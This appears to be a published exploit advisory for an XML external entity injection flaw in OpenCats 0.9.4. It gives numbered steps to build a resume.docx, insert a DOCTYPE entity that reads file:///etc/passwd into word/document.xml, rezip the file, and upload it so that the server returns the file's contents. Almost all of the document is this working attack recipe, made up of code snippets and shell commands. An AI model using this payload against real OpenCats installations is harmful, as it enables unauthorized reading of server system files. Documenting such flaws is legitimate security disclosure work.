OpenCats 0.9.4 XML Injection

OpenCats version 0.9.4 suffers from an XML external entity injection vulnerability.


MD5 | fa3b011ba2fabdc7acfdd32ac95b62d2

#Author : Raed Ahsan
#Platform : OpenCats
#Version : 0.9.4
#Date : 20/09/2021
#LinkedIn : https://linkedin.com/in/raed-ahsan

<===============================================================================>

*INSTRUCTIONS FOR EXPLOITING THE OPENCATS 0.9.4*

<===============================================================================>

1 ) Create a file called "cv.py"
2 ) Paste the following into the cv.py file:

from docx import Document
document = Document()
paragraph = document.add_paragraph("YOUR NAME")
document.save("resume.docx")



3 ) Run the cv.py
4 ) a resume.docx file has been created.
5 ) unzip the resume.docx
6 ) cd (change directory) to word/
7 ) use your editor and open document.xml
8 ) After the first line where <?xml starts, embed the following:


<!DOCTYPE test [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>

9 ) Find where your name is written in the document.xml. The code will look something like this:


<w:body><w:p><w:r><w:t>YOUR_NAME</w:t></w:r



10 ) remove your name and write "&test;". It will look like this:


<w:body><w:p><w:r><w:t>&test;</w:t></w:r



11 ) Save the file and exit.
12 ) Go out of the word/ directory.
13 ) zip your resume.docx with document.xml using this command:

zip resume.docx word/document.xml
14 ) If correctly zipped, it will respond with (deflated 65%) or 64%
15 ) upload the resume.docx onto the resume upload section of opencats.
16 ) the contents of /etc/passwd will be presented to you in the input field.

Related Posts